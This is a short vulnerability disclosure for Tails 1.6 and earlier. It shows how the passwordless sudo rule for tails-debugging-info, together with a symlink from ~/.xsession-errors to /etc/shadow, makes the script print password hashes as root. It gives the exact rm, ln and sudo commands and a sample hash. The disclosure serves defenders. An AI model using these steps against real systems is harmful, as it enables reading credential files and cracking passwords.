Tails 1.6 Information Disclosure
Posted on 14 November 2015
Tails <= 1.6 tails-debugging-info information leak by cenobyte 2015 <vincitamorpatriae@gmail.com> On Tails <= 1.6 it is possible to show the contents of /etc/shadow within the context of the amnesia user when a password is set for that user. The amnesia user can execute tails-debugging-info as root without a password using sudo (/etc/sudoers.d/zzz_tails-debugging-info): amnesia ALL = NOPASSWD: /usr/local/sbin/tails-debugging-info "" Note: Other commands executed as root using sudo which are not listed in the sudoers files require a password. There's a function in tails-debugging-info named debug_file() which serves as a wrapper around cat: debug_file() { echo echo "===== content of $1 =====" cat "$1" } debug_file() is called in tails-debugging-info with the following parameter: debug_file "/home/amnesia/.xsession-errors" The .xsession-errors file is owned by the amnesia user and can be deleted and replaced with a symlink to /etc/shadow: amnesia@amnesia:~$ rm ~/.xsession-errors amnesia@amnesia:~$ ln -s /etc/shadow ~/.xsession-errors Running sudo tails-debugging-info now displays the password hash of the amnesia user: amnesia@amnesia:~$ sudo tails-debugging-info 2>/dev/null | grep ^amnesia amnesia:$6$r0jt1v9E$UOrWbJ70qAH/sjaKfjmCMvkXZ19bqC2ieQ2UvYk0HKwVvgxuZFtyIwjoLfgH AwrZVM3a0NTEkcsQY1hn/Uq2S0:16710:0:99999:7:::